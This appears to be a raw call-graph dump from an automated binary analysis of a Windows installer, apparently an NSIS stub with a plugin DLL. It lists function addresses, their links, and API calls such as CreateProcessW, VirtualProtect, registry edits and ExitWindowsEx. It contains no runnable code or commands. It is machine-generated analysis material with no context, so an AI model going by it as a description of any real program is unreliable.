1000278d 4355 100027dd 4354->4355 4356 1000279d VirtualProtect 4354->4356 4356->4355 5054 40164d 5055 402b3a 18 API calls 5054->5055 5056 401653 5055->5056 5057 4060ba 2 API calls 5056->5057 5058 401659 5057->5058 5059 4019cf 5060 402b3a 18 API calls 5059->5060 5061 4019d6 5060->5061 5062 402b3a 18 API calls 5061->5062 5063 4019df 5062->5063 5064 4019e6 lstrcmpiW 5063->5064 5065 4019f8 lstrcmpW 5063->5065 5066 4019ec 5064->5066 5065->5066 5067 4040d0 lstrcpynW lstrlenW 4357 401e51 4358 402b3a 18 API calls 4357->4358 4359 401e57 4358->4359 4360 405021 25 API calls 4359->4360 4361 401e61 4360->4361 4375 4054f2 CreateProcessW 4361->4375 4364 401ec6 CloseHandle 4367 402793 4364->4367 4365 401e77 WaitForSingleObject 4366 401e89 4365->4366 4368 401e9b GetExitCodeProcess 4366->4368 4378 40611a 4366->4378 4370 401eba 4368->4370 4371 401ead 4368->4371 4370->4364 4372 401eb8 4370->4372 4382 405cbe wsprintfW 4371->4382 4372->4364 4376 405521 CloseHandle 4375->4376 4377 401e67 4375->4377 4376->4377 4377->4364 4377->4365 4377->4367 4379 406137 PeekMessageW 4378->4379 4380 401e90 WaitForSingleObject 4379->4380 4381 40612d DispatchMessageW 4379->4381 4380->4366 4381->4379 4382->4372 4433 401752 4434 402b3a 18 API calls 4433->4434 4435 401759 4434->4435 4436 401781 4435->4436 4437 401779 4435->4437 4473 405d77 lstrcpynW 4436->4473 4472 405d77 lstrcpynW 4437->4472 4440 40177f 4444 40600b 5 API calls 4440->4444 4441 40178c 4442 4057c2 3 API calls 4441->4442 4443 401792 lstrcatW 4442->4443 4443->4440 4450 40179e 4444->4450 4445 4060ba 2 API calls 4445->4450 4446 4059be 2 API calls 4446->4450 4448 4017b0 CompareFileTime 4448->4450 4449 401870 4451 405021 25 API calls 4449->4451 4450->4445 4450->4446 4450->4448 4450->4449 4453 405d77 lstrcpynW 4450->4453 4459 405d99 18 API calls 4450->4459 4465 405553 MessageBoxIndirectW 4450->4465 4469 401847 4450->4469 4471 4059e3 GetFileAttributesW CreateFileW 4450->4471 4454 40187a 4451->4454 4452 405021 25 API calls 4470 40185c 4452->4470 4453->4450 4455 402fa2 37 API calls 4454->4455 4456 40188d 4455->4456 4457 4018a1 SetFileTime 4456->4457 4458 4018b3 CloseHandle 4456->4458 4457->4458 4460 4018c4 4458->4460 4458->4470 4459->4450 4461 4018c9 4460->4461 4462 4018dc 4460->4462 4463 405d99 18 API calls 4461->4463 4464 405d99 18 API calls 4462->4464 4466 4018d1 lstrcatW 4463->4466 4467 4018e4 4464->4467 4465->4450 4466->4467 4468 405553 MessageBoxIndirectW 4467->4468 4468->4470 4469->4452 4469->4470 4471->4450 4472->4440 4473->4441 4474 402253 4475 40225b 4474->4475 4478 402261 4474->4478 4476 402b3a 18 API calls 4475->4476 4476->4478 4477 40227d 4481 402b3a 18 API calls 4477->4481 4479 402b3a 18 API calls 4478->4479 4482 40226f 4478->4482 4479->4482 4480 402b3a 18 API calls 4480->4477 4483 402286 WritePrivateProfileStringW 4481->4483 4482->4477 4482->4480 4499 402454 4500 402c44 19 API calls 4499->4500 4501 40245e 4500->4501 4502 402b1d 18 API calls 4501->4502 4503 402467 4502->4503 4504 402472 4503->4504 4507 402793 4503->4507 4505 40248b RegEnumValueW 4504->4505 4506 40247f RegEnumKeyW 4504->4506 4505->4507 4508 4024a4 RegCloseKey 4505->4508 4506->4508 4508->4507 5068 401ed4 5069 402b3a 18 API calls 5068->5069 5070 401edb 5069->5070 5071 4060ba 2 API calls 5070->5071 5072 401ee1 5071->5072 5074 401ef2 5072->5074 5075 405cbe wsprintfW 5072->5075 5075->5074 4510 4022d5 4511 402305 4510->4511 4512 4022da 4510->4512 4514 402b3a 18 API calls 4511->4514 4513 402c44 19 API calls 4512->4513 4515 4022e1 4513->4515 4516 40230c 4514->4516 4517 4022eb 4515->4517 4521 402322 4515->4521 4522 402b7a RegOpenKeyExW 4516->4522 4518 402b3a 18 API calls 4517->4518 4519 4022f2 RegDeleteValueW RegCloseKey 4518->4519 4519->4521 4523 402c0e 4522->4523 4525 402ba5 4522->4525 4523->4521 4524 402bcb RegEnumKeyW 4524->4525 4526 402bdd RegCloseKey 4524->4526 4525->4524 4525->4526 4527 402c02 RegCloseKey 4525->4527 4529 402b7a 3 API calls 4525->4529 4528 4060e1 3 API calls 4526->4528 4531 402bf1 4527->4531 4530 402bed 4528->4530 4529->4525 4530->4531 4532 402c1d RegDeleteKeyW 4530->4532 4531->4523 4532->4531 4533 4014d7 4534 402b1d 18 API calls 4533->4534 4535 4014dd Sleep 4534->4535 4537 4029c7 4535->4537 5083 404457 5084 404483 5083->5084 5085 404494 5083->5085 5144 405537 GetDlgItemTextW 5084->5144 5087 4044a0 GetDlgItem 5085->5087 5092 4044ff 5085->5092 5089 4044b4 5087->5089 5088 40448e 5091 40600b 5 API calls 5088->5091 5095 4044c8 SetWindowTextW 5089->5095 5100 40586d 4 API calls 5089->5100 5090 4045e3 5093 404784 5090->5093 5146 405537 GetDlgItemTextW 5090->5146 5091->5085 5092->5090 5092->5093 5096 405d99 18 API calls 5092->5096 5099 404023 8 API calls 5093->5099 5098 403fbc 19 API calls 5095->5098 5102 404573 SHBrowseForFolderW 5096->5102 5097 404613 5103 4058ca 18 API calls 5097->5103 5104 4044e4 5098->5104 5105 404798 5099->5105 5101 4044be 5100->5101 5101->5095 5109 4057c2 3 API calls 5101->5109 5102->5090 5106 40458b CoTaskMemFree 5102->5106 5107 404619 5103->5107 5108 403fbc 19 API calls 5104->5108 5110 4057c2 3 API calls 5106->5110 5147 405d77 lstrcpynW 5107->5147 5111 4044f2 5108->5111 5109->5095 5112 404598 5110->5112 5145 403ff1 SendMessageW 5111->5145 5115 4045cf SetDlgItemTextW 5112->5115 5120 405d99 18 API calls 5112->5120 5115->5090 5116 4044f8 5118 4060e1 3 API calls 5116->5118 5117 404630 5119 4060e1 3 API calls 5117->5119 5118->5092 5126 404638 5119->5126 5121 4045b7 lstrcmpiW 5120->5121 5121->5115 5124 4045c8 lstrcatW 5121->5124 5122 404677 5148 405d77 lstrcpynW 5122->5148 5124->5115 5125 40467e 5127 40586d 4 API calls 5125->5127 5126->5122 5130 40580e 2 API calls 5126->5130 5132 4046c9 5126->5132 5128 404684 GetDiskFreeSpaceW 5127->5128 5131 4046a7 MulDiv 5128->5131 5128->5132 5130->5126 5131->5132 5133 404733 5132->5133 5149 404805 5132->5149 5135 404756 5133->5135 5136 40140b 2 API calls 5133->5136 5157 403fde KiUserCallbackDispatcher 5135->5157 5136->5135 5137 404725 5139 404735 SetDlgItemTextW 5137->5139 5140 40472a 5137->5140 5139->5133 5142 404805 21 API calls 5140->5142 5141 404772 5141->5093 5158 4043ec 5141->5158 5142->5133 5144->5088 5145->5116 5146->5097 5147->5117 5148->5125 5150 404822 5149->5150 5151 405d99 18 API calls 5150->5151 5152 404857 5151->5152 5153 405d99 18 API calls 5152->5153 5154 404862 5153->5154 5155 405d99 18 API calls 5154->5155 5156 404893 lstrlenW wsprintfW SetDlgItemTextW 5155->5156 5156->5137 5157->5141 5159 4043fa 5158->5159 5160 4043ff SendMessageW 5158->5160 5159->5160 5160->5093 5161 404159 5163 40428b 5161->5163 5164 404171 5161->5164 5162 4042f5 5165 4043c7 5162->5165 5166 4042ff GetDlgItem 5162->5166 5163->5162 5163->5165 5170 4042c6 GetDlgItem SendMessageW 5163->5170 5167 403fbc 19 API calls 5164->5167 5172 404023 8 API calls 5165->5172 5168 404388 5166->5168 5169 404319 5166->5169 5171 4041d8 5167->5171 5168->5165 5177 40439a 5168->5177 5169->5168 5176 40433f 6 API calls 5169->5176 5192 403fde KiUserCallbackDispatcher 5170->5192 5174 403fbc 19 API calls 5171->5174 5175 4043c2 5172->5175 5179 4041e5 CheckDlgButton 5174->5179 5176->5168 5180 4043b0 5177->5180 5181 4043a0 SendMessageW 5177->5181 5178 4042f0 5183 4043ec SendMessageW 5178->5183 5190 403fde KiUserCallbackDispatcher 5179->5190 5180->5175 5182 4043b6 SendMessageW 5180->5182 5181->5180 5182->5175 5183->5162 5185 404203 GetDlgItem 5191 403ff1 SendMessageW 5185->5191 5187 404219 SendMessageW 5188 404236 GetSysColor 5187->5188 5189 40423f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5187->5189 5188->5189 5189->5175 5190->5185 5191->5187 5192->5178 5193 40155b 5194 40296d 5193->5194 5197 405cbe wsprintfW 5194->5197 5196 402972 5197->5196 4755 40165e 4756 402b3a 18 API calls 4755->4756 4757 401665 4756->4757 4758 402b3a 18 API calls 4757->4758 4759 40166e 4758->4759 4760 402b3a 18 API calls 4759->4760 4761 401677 MoveFileW 4760->4761 4762 401683 4761->4762 4763 40168a 4761->4763 4765 401423 25 API calls 4762->4765 4764 4060ba 2 API calls 4763->4764 4767 402197 4763->4767 4766 401699 4764->4766 4765->4767 4766->4767 4768 405c11 40 API calls 4766->4768 4768->4762 3923 405160 3924 405181 GetDlgItem GetDlgItem GetDlgItem 3923->3924 3925 40530c 3923->3925 3969 403ff1 SendMessageW 3924->3969 3927 405315 GetDlgItem CreateThread CloseHandle 3925->3927 3928 40533d 3925->3928 3927->3928 4042 4050f4 OleInitialize 3927->4042 3929 405368 3928->3929 3931 405354 ShowWindow ShowWindow 3928->3931 3932 40538d 3928->3932 3933 405374 3929->3933 3934 4053c8 3929->3934 3930 4051f2 3939 4051f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3930->3939 3974 403ff1 SendMessageW 3931->3974 3978 404023 3932->3978 3936 4053a2 ShowWindow 3933->3936 3937 40537c 3933->3937 3934->3932 3942 4053d6 SendMessageW 3934->3942 3945 4053c2 3936->3945 3946 4053b4 3936->3946 3975 403f95 3937->3975 3940 405268 3939->3940 3941 40524c SendMessageW SendMessageW 3939->3941 3947 40527b 3940->3947 3948 40526d SendMessageW 3940->3948 3941->3940 3944 40539b 3942->3944 3949 4053ef CreatePopupMenu 3942->3949 3951 403f95 SendMessageW 3945->3951 3992 405021 3946->3992 3970 403fbc 3947->3970 3948->3947 4003 405d99 3949->4003 3951->3934 3955 40528b 3958 405294 ShowWindow 3955->3958 3959 4052c8 GetDlgItem SendMessageW 3955->3959 3956 40541c GetWindowRect 3957 40542f TrackPopupMenu 3956->3957 3957->3944 3960 40544a 3957->3960 3961 4052b7 3958->3961 3962 4052aa ShowWindow 3958->3962 3959->3944 3963 4052ef SendMessageW SendMessageW 3959->3963 3964 405466 SendMessageW 3960->3964 3973 403ff1 SendMessageW 3961->3973 3962->3961 3963->3944 3964->3964 3965 405483 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3964->3965 3967 4054a8 SendMessageW 3965->3967 3967->3967 3968 4054d1 GlobalUnlock SetClipboardData CloseClipboard 3967->3968 3968->3944 3969->3930 3971 405d99 18 API calls 3970->3971 3972 403fc7 SetDlgItemTextW 3971->3972 3972->3955 3973->3959 3974->3929 3976 403fa2 SendMessageW 3975->3976 3977 403f9c 3975->3977 3976->3932 3977->3976 3979 40403b GetWindowLongW 3978->3979 3989 4040c4 3978->3989 3980 40404c 3979->3980 3979->3989 3981 40405b GetSysColor 3980->3981 3982 40405e 3980->3982 3981->3982 3983 404064 SetTextColor 3982->3983 3984 40406e SetBkMode 3982->3984 3983->3984 3985 404086 GetSysColor 3984->3985 3986 40408c 3984->3986 3985->3986 3987 404093 SetBkColor 3986->3987 3988 40409d 3986->3988 3987->3988 3988->3989 3990 4040b0 DeleteObject 3988->3990 3991 4040b7 CreateBrushIndirect 3988->3991 3989->3944 3990->3991 3991->3989 3993 40503c 3992->3993 4002 4050de 3992->4002 3994 405058 lstrlenW 3993->3994 3995 405d99 18 API calls 3993->3995 3996 405081 3994->3996 3997 405066 lstrlenW 3994->3997 3995->3994 3999 405094 3996->3999 4000 405087 SetWindowTextW 3996->4000 3998 405078 lstrcatW 3997->3998 3997->4002 3998->3996 4001 40509a SendMessageW SendMessageW SendMessageW 3999->4001 3999->4002 4000->3999 4001->4002 4002->3945 4008 405da6 4003->4008 4004 405ff1 4005 4053ff AppendMenuW 4004->4005 4037 405d77 lstrcpynW 4004->4037 4005->3956 4005->3957 4007 405e59 GetVersion 4007->4008 4008->4004 4008->4007 4009 405fbf lstrlenW 4008->4009 4012 405d99 10 API calls 4008->4012 4013 405ed4 GetSystemDirectoryW 4008->4013 4015 405ee7 GetWindowsDirectoryW 4008->4015 4017 405f1b SHGetSpecialFolderLocation 4008->4017 4018 405d99 10 API calls 4008->4018 4019 405f60 lstrcatW 4008->4019 4021 405c44 RegOpenKeyExW 4008->4021 4026 40600b 4008->4026 4035 405cbe wsprintfW 4008->4035 4036 405d77 lstrcpynW 4008->4036 4009->4008 4012->4009 4013->4008 4015->4008 4017->4008 4020 405f33 SHGetPathFromIDListW CoTaskMemFree 4017->4020 4018->4008 4019->4008 4020->4008 4022 405cb8 4021->4022 4023 405c78 RegQueryValueExW 4021->4023 4022->4008 4024 405c99 RegCloseKey 4023->4024 4024->4022 4033 406018 4026->4033 4027 40608e 4028 406093 CharPrevW 4027->4028 4030 4060b4 4027->4030 4028->4027 4029 406081 CharNextW 4029->4027 4029->4033 4030->4008 4032 40606d CharNextW 4032->4033 4033->4027 4033->4029 4033->4032 4034 40607c CharNextW 4033->4034 4038 4057ef 4033->4038 4034->4029 4035->4008 4036->4008 4037->4005 4039 4057f5 4038->4039 4040 40580b 4039->4040 4041 4057fc CharNextW 4039->4041 4040->4033 4041->4039 4049 404008 4042->4049 4044 405117 4048 40513e 4044->4048 4052 401389 4044->4052 4045 404008 SendMessageW 4046 405150 OleUninitialize 4045->4046 4048->4045 4050 404020 4049->4050 4051 404011 SendMessageW 4049->4051 4050->4044 4051->4050 4054 401390 4052->4054 4053 4013fe 4053->4044 4054->4053 4055 4013cb MulDiv SendMessageW 4054->4055 4055->4054 4056 4023e0 4067 402c44 4056->4067 4058 4023ea 4071 402b3a 4058->4071 4061 4023fe RegQueryValueExW 4062 402424 RegCloseKey 4061->4062 4063 40241e 4061->4063 4066 402793 4062->4066 4063->4062 4077 405cbe wsprintfW 4063->4077 4068 402b3a 18 API calls 4067->4068 4069 402c5d 4068->4069 4070 402c6b RegOpenKeyExW 4069->4070 4070->4058 4072 402b46 4071->4072 4073 405d99 18 API calls 4072->4073 4074 402b67 4073->4074 4075 4023f3 4074->4075 4076 40600b 5 API calls 4074->4076 4075->4061 4075->4066 4076->4075 4077->4062 4237 403ae4 4238 403c37 4237->4238 4239 403afc 4237->4239 4241 403c88 4238->4241 4242 403c48 GetDlgItem GetDlgItem 4238->4242 4239->4238 4240 403b08 4239->4240 4244 403b13 SetWindowPos 4240->4244 4245 403b26 4240->4245 4243 403ce2 4241->4243 4251 401389 2 API calls 4241->4251 4246 403fbc 19 API calls 4242->4246 4247 404008 SendMessageW 4243->4247 4268 403c32 4243->4268 4244->4245 4248 403b43 4245->4248 4249 403b2b ShowWindow 4245->4249 4250 403c72 SetClassLongW 4246->4250 4280 403cf4 4247->4280 4252 403b65 4248->4252 4253 403b4b DestroyWindow 4248->4253 4249->4248 4254 40140b 2 API calls 4250->4254 4255 403cba 4251->4255 4256 403b6a SetWindowLongW 4252->4256 4257 403b7b 4252->4257 4306 403f45 4253->4306 4254->4241 4255->4243 4260 403cbe SendMessageW 4255->4260 4256->4268 4258 403c24 4257->4258 4259 403b87 GetDlgItem 4257->4259 4265 404023 8 API calls 4258->4265 4263 403bb7 4259->4263 4264 403b9a SendMessageW IsWindowEnabled 4259->4264 4260->4268 4261 40140b 2 API calls 4261->4280 4262 403f47 DestroyWindow EndDialog 4262->4306 4267 403bbc 4263->4267 4270 403bc4 4263->4270 4271 403c0b SendMessageW 4263->4271 4272 403bd7 4263->4272 4264->4263 4264->4268 4265->4268 4266 403f76 ShowWindow 4266->4268 4273 403f95 SendMessageW 4267->4273 4269 405d99 18 API calls 4269->4280 4270->4267 4270->4271 4271->4258 4275 403bf4 4272->4275 4276 403bdf 4272->4276 4274 403bf2 4273->4274 4274->4258 4278 40140b 2 API calls 4275->4278 4310 40140b 4276->4310 4277 403fbc 19 API calls 4277->4280 4281 403bfb 4278->4281 4280->4261 4280->4262 4280->4268 4280->4269 4280->4277 4282 403fbc 19 API calls 4280->4282 4297 403e87 DestroyWindow 4280->4297 4281->4258 4281->4267 4283 403d6f GetDlgItem 4282->4283 4284 403d84 4283->4284 4285 403d8c ShowWindow KiUserCallbackDispatcher 4283->4285 4284->4285 4307 403fde KiUserCallbackDispatcher 4285->4307 4287 403db6 EnableWindow 4290 403dca 4287->4290 4288 403dcf GetSystemMenu EnableMenuItem SendMessageW 4289 403dff SendMessageW 4288->4289 4288->4290 4289->4290 4290->4288 4308 403ff1 SendMessageW 4290->4308 4309 405d77 lstrcpynW 4290->4309 4293 403e2d lstrlenW 4294 405d99 18 API calls 4293->4294 4295 403e43 SetWindowTextW 4294->4295 4296 401389 2 API calls 4295->4296 4296->4280 4298 403ea1 CreateDialogParamW 4297->4298 4297->4306 4299 403ed4 4298->4299 4298->4306 4300 403fbc 19 API calls 4299->4300 4301 403edf GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4300->4301 4302 401389 2 API calls 4301->4302 4303 403f25 4302->4303 4303->4268 4304 403f2d ShowWindow 4303->4304 4305 404008 SendMessageW 4304->4305 4305->4306 4306->4266 4306->4268 4307->4287 4308->4290 4309->4293 4311 401389 2 API calls 4310->4311 4312 401420 4311->4312 4312->4267 5198 401ce5 GetDlgItem GetClientRect 5199 402b3a 18 API calls 5198->5199 5200 401d17 LoadImageW SendMessageW 5199->5200 5201 401d35 DeleteObject 5200->5201 5202 4029c7 5200->5202 5201->5202 5203 40206a 5204 402b3a 18 API calls 5203->5204 5205 402071 5204->5205 5206 402b3a 18 API calls 5205->5206 5207 40207b 5206->5207 5208 402b3a 18 API calls 5207->5208 5209 402084 5208->5209 5210 402b3a 18 API calls 5209->5210 5211 40208e 5210->5211 5212 402b3a 18 API calls 5211->5212 5213 402098 5212->5213 5214 4020ac CoCreateInstance 5213->5214 5215 402b3a 18 API calls 5213->5215 5217 4020cb 5214->5217 5215->5214 5216 401423 25 API calls 5218 402197 5216->5218 5217->5216 5217->5218 4346 40156b 4347 401584 4346->4347 4348 40157b ShowWindow 4346->4348 4349 401592 ShowWindow 4347->4349 4350 4029c7 4347->4350 4348->4347 4349->4350 5226 4024ee 5227 4024f3 5226->5227 5228 40250c 5226->5228 5229 402b1d 18 API calls 5227->5229 5230 402512 5228->5230 5231 40253e 5228->5231 5235 4024fa 5229->5235 5233 402b3a 18 API calls 5230->5233 5232 402b3a 18 API calls 5231->5232 5234 402545 lstrlenW 5232->5234 5236 402519 WideCharToMultiByte lstrlenA 5233->5236 5234->5235 5237 402567 WriteFile 5235->5237 5238 402793 5235->5238 5236->5235 5237->5238 5239 4018ef 5240 401926 5239->5240 5241 402b3a 18 API calls 5240->5241 5242 40192b 5241->5242 5243 4055ff 71 API calls 5242->5243 5244 401934 5243->5244 5245 402770 5246 402b3a 18 API calls 5245->5246 5247 402777 FindFirstFileW 5246->5247 5248 40278a 5247->5248 5249 40279f 5247->5249 5250 4027a8 5249->5250 5253 405cbe wsprintfW 5249->5253 5254 405d77 lstrcpynW 5250->5254 5253->5250 5254->5248 5255 4014f1 SetForegroundWindow 5256 4029c7 5255->5256 5257 4018f2 5258 402b3a 18 API calls 5257->5258 5259 4018f9 5258->5259 5260 405553 MessageBoxIndirectW 5259->5260 5261 401902 5260->5261 4484 401df3 4485 402b3a 18 API calls 4484->4485 4486 401df9 4485->4486 4487 402b3a 18 API calls 4486->4487 4488 401e02 4487->4488 4489 402b3a 18 API calls 4488->4489 4490 401e0b 4489->4490 4491 402b3a 18 API calls 4490->4491 4492 401e14 4491->4492 4496 401423 4492->4496 4495 401e4c 4497 405021 25 API calls 4496->4497 4498 401431 ShellExecuteW 4497->4498 4498->4495 5262 402573 5263 402b1d 18 API calls 5262->5263 5265 402582 5263->5265 5264 4026a0 5265->5264 5266 4025c8 ReadFile 5265->5266 5267 405a66 ReadFile 5265->5267 5268 4026a2 5265->5268 5269 402608 MultiByteToWideChar 5265->5269 5271 4026b3 5265->5271 5272 40262e SetFilePointer MultiByteToWideChar 5265->5272 5266->5264 5266->5265 5267->5265 5274 405cbe wsprintfW 5268->5274 5269->5265 5271->5264 5273 4026d4 SetFilePointer 5271->5273 5272->5265 5273->5264 5274->5264 5280 4026f9 5281 402700 5280->5281 5283 402972 5280->5283 5282 402b1d 18 API calls 5281->5282 5284 40270b 5282->5284 5285 402712 SetFilePointer 5284->5285 5285->5283 5286 402722 5285->5286 5288 405cbe wsprintfW 5286->5288 5288->5283 5289 1000103d 5290 1000101b 8 API calls 5289->5290 5291 10001056 5290->5291 4779 4031ff #17 SetErrorMode OleInitialize 4780 4060e1 3 API calls 4779->4780 4781 403242 SHGetFileInfoW 4780->4781 4852 405d77 lstrcpynW 4781->4852 4783 40326d GetCommandLineW 4853 405d77 lstrcpynW 4783->4853 4785 40327f GetModuleHandleW 4786 403297 4785->4786 4787 4057ef CharNextW 4786->4787 4788 4032a6 CharNextW 4787->4788 4793 4032b6 4788->4793 4789 40338b 4790 40339f GetTempPathW 4789->4790 4854 4031cb 4790->4854 4792 4033b7 4794 403411 DeleteFileW 4792->4794 4795 4033bb GetWindowsDirectoryW lstrcatW 4792->4795 4793->4789 4796 4057ef CharNextW 4793->4796 4803 40338d 4793->4803 4862 402d69 GetTickCount GetModuleFileNameW 4794->4862 4797 4031cb 11 API calls 4795->4797 4796->4793 4799 4033d7 4797->4799 4799->4794 4802 4033db GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4799->4802 4800 4034bd 4947 403667 4800->4947 4801 403425 4801->4800 4804 4034ad 4801->4804 4809 4057ef CharNextW 4801->4809 4807 4031cb 11 API calls 4802->4807 4944 405d77 lstrcpynW 4803->4944 4890 403741 4804->4890 4811 403409 4807->4811 4812 403440 4809->4812 4811->4794 4811->4800 4819 403487 4812->4819 4820 4034ec lstrcatW lstrcmpiW 4812->4820 4813 4034d6 4816 405553 MessageBoxIndirectW 4813->4816 4814 4035cc 4815 40364f ExitProcess 4814->4815 4817 4060e1 3 API calls 4814->4817 4821 4034e4 ExitProcess 4816->4821 4822 4035db 4817->4822 4823 4058ca 18 API calls 4819->4823 4820->4800 4824 403508 CreateDirectoryW SetCurrentDirectoryW 4820->4824 4825 4060e1 3 API calls 4822->4825 4826 403493 4823->4826 4827 403520 4824->4827 4828 40352b 4824->4828 4830 4035e4 4825->4830 4826->4800 4945 405d77 lstrcpynW 4826->4945 4954 405d77 lstrcpynW 4827->4954 4955 405d77 lstrcpynW 4828->4955 4832 4060e1 3 API calls 4830->4832 4834 4035ed 4832->4834 4838 40363b ExitWindowsEx 4834->4838 4843 4035fb GetCurrentProcess 4834->4843 4835 4034a2 4946 405d77 lstrcpynW 4835->4946 4837 405d99 18 API calls 4839 40356a DeleteFileW 4837->4839 4838->4815 4840 403648 4838->4840 4841 403577 CopyFileW 4839->4841 4849 403539 4839->4849 4842 40140b 2 API calls 4840->4842 4841->4849 4842->4815 4847 40360b 4843->4847 4844 4035c0 4845 405c11 40 API calls 4844->4845 4845->4800 4846 405c11 40 API calls 4846->4849 4847->4838 4848 405d99 18 API calls 4848->4849 4849->4837 4849->4844 4849->4846 4849->4848 4850 4054f2 2 API calls 4849->4850 4851 4035ab CloseHandle 4849->4851 4850->4849 4851->4849 4852->4783 4853->4785 4855 40600b 5 API calls 4854->4855 4856 4031d7 4855->4856 4857 4031e1 4856->4857 4858 4057c2 3 API calls 4856->4858 4857->4792 4859 4031e9 CreateDirectoryW 4858->4859 4860 405a12 2 API calls 4859->4860 4861 4031fd 4860->4861 4861->4792 4956 4059e3 GetFileAttributesW CreateFileW 4862->4956 4864 402da9 4882 402db9 4864->4882 4957 405d77 lstrcpynW 4864->4957 4866 402dcf 4867 40580e 2 API calls 4866->4867 4868 402dd5 4867->4868 4958 405d77 lstrcpynW 4868->4958 4870 402de0 GetFileSize 4871 402edc 4870->4871 4884 402df7 4870->4884 4959 402d05 4871->4959 4873 402ee5 4875 402f15 GlobalAlloc 4873->4875 4873->4882 4971 4031b4 SetFilePointer 4873->4971 4874 40319e ReadFile 4874->4884 4970 4031b4 SetFilePointer 4875->4970 4877 402f48 4879 402d05 6 API calls 4877->4879 4879->4882 4880 402efe 4883 40319e ReadFile 4880->4883 4881 402f30 4885 402fa2 37 API calls 4881->4885 4882->4801 4886 402f09 4883->4886 4884->4871 4884->4874 4884->4877 4884->4882 4887 402d05 6 API calls 4884->4887 4888 402f3c 4885->4888 4886->4875 4886->4882 4887->4884 4888->4882 4888->4888 4889 402f79 SetFilePointer 4888->4889 4889->4882 4891 4060e1 3 API calls 4890->4891 4892 403755 4891->4892 4893 40375b 4892->4893 4894 40376d 4892->4894 4981 405cbe wsprintfW 4893->4981 4895 405c44 3 API calls 4894->4895 4896 40379d 4895->4896 4898 4037bc lstrcatW 4896->4898 4899 405c44 3 API calls 4896->4899 4900 40376b 4898->4900 4899->4898 4972 403a17 4900->4972 4903 4058ca 18 API calls 4904 4037ee 4903->4904 4905 403882 4904->4905 4907 405c44 3 API calls 4904->4907 4906 4058ca 18 API calls 4905->4906 4908 403888 4906->4908 4909 403820 4907->4909 4910 403898 LoadImageW 4908->4910 4911 405d99 18 API calls 4908->4911 4909->4905 4917 403841 lstrlenW 4909->4917 4921 4057ef CharNextW 4909->4921 4912 40393e 4910->4912 4913 4038bf RegisterClassW 4910->4913 4911->4910 4916 40140b 2 API calls 4912->4916 4914 4038f5 SystemParametersInfoW CreateWindowExW 4913->4914 4915 403948 4913->4915 4914->4912 4915->4800 4920 403944 4916->4920 4918 403875 4917->4918 4919 40384f lstrcmpiW 4917->4919 4923 4057c2 3 API calls 4918->4923 4919->4918 4922 40385f GetFileAttributesW 4919->4922 4920->4915 4926 403a17 19 API calls 4920->4926 4924 40383e 4921->4924 4925 40386b 4922->4925 4927 40387b 4923->4927 4924->4917 4925->4918 4928 40580e 2 API calls 4925->4928 4929 403955 4926->4929 4982 405d77 lstrcpynW 4927->4982 4928->4918 4931 403961 ShowWindow LoadLibraryW 4929->4931 4932 4039e4 4929->4932 4934 403980 LoadLibraryW 4931->4934 4935 403987 GetClassInfoW 4931->4935 4933 4050f4 5 API calls 4932->4933 4936 4039ea 4933->4936 4934->4935 4937 4039b1 DialogBoxParamW 4935->4937 4938 40399b GetClassInfoW RegisterClassW 4935->4938 4939 403a06 4936->4939 4940 4039ee 4936->4940 4941 40140b 2 API calls 4937->4941 4938->4937 4942 40140b 2 API calls 4939->4942 4940->4915 4943 40140b 2 API calls 4940->4943 4941->4915 4942->4915 4943->4915 4944->4790 4945->4835 4946->4804 4948 403671 CloseHandle 4947->4948 4949 40367f 4947->4949 4948->4949 4984 4036ac 4949->4984 4952 4055ff 71 API calls 4953 4034c6 OleUninitialize 4952->4953 4953->4813 4953->4814 4954->4828 4955->4849 4956->4864 4957->4866 4958->4870 4960 402d26 4959->4960 4961 402d0e 4959->4961 4964 402d36 GetTickCount 4960->4964 4965 402d2e 4960->4965 4962 402d17 DestroyWindow 4961->4962 4963 402d1e 4961->4963 4962->4963 4963->4873 4967 402d44 CreateDialogParamW ShowWindow 4964->4967 4968 402d67 4964->4968 4966 40611a 2 API calls 4965->4966 4969 402d34 4966->4969 4967->4968 4968->4873 4969->4873 4970->4881 4971->4880 4973 403a2b 4972->4973 4983 405cbe wsprintfW 4973->4983 4975 403a9c 4976 405d99 18 API calls 4975->4976 4977 403aa8 SetWindowTextW 4976->4977 4978 4037cc 4977->4978 4979 403ac4 4977->4979 4978->4903 4979->4978 4980 405d99 18 API calls 4979->4980 4980->4979 4981->4900 4982->4905 4983->4975 4985 4036ba 4984->4985 4986 403684 4985->4986 4987 4036bf FreeLibrary GlobalFree 4985->4987 4986->4952 4987->4986 4987->4987 5292 402c7f 5293 402c91 SetTimer 5292->5293 5294 402caa 5292->5294 5293->5294 5295 402cff 5294->5295 5296 402cc4 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5294->5296 5296->5295 5297 4014ff 5298 401507 5297->5298 5300 40151a 5297->5300 5299 402b1d 18 API calls 5298->5299 5299->5300 5301 4036ff 5302 40370a 5301->5302 5303 403711 GlobalAlloc 5302->5303 5304 40370e 5302->5304 5303->5304 5305 401000 5306 401037 BeginPaint GetClientRect 5305->5306 5308 40100c DefWindowProcW 5305->5308 5309 4010f3 5306->5309 5310 401179 5308->5310 5311 401073 CreateBrushIndirect FillRect DeleteObject 5309->5311 5312 4010fc 5309->5312 5311->5309 5313 401102 CreateFontIndirectW 5312->5313 5314 401167 EndPaint 5312->5314 5313->5314 5315 401112 6 API calls 5313->5315 5314->5310 5315->5314 5316 401a00 5317 402b3a 18 API calls 5316->5317 5318 401a09 ExpandEnvironmentStringsW 5317->5318 5319 401a30 5318->5319 5320 401a1d 5318->5320 5320->5319 5321 401a22 lstrcmpW 5320->5321 5321->5319 5329 401b01 5330 402b3a 18 API calls 5329->5330 5331 401b08 5330->5331 5332 402b1d 18 API calls 5331->5332 5333 401b11 wsprintfW 5332->5333 5334 4029c7 5333->5334 5335 100018c1 5336 10001243 3 API calls 5335->5336 5337 100018e7 5336->5337 5338 10001243 3 API calls 5337->5338 5339 100018ef 5338->5339 5340 10001243 3 API calls 5339->5340 5343 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5339->5343 5341 10001916 5340->5341 5342 1000191f GlobalFree 5341->5342 5342->5343 5344 10001280 2 API calls 5343->5344 5345 10001aad GlobalFree GlobalFree 5344->5345 5346 406a02 5348 406250 5346->5348 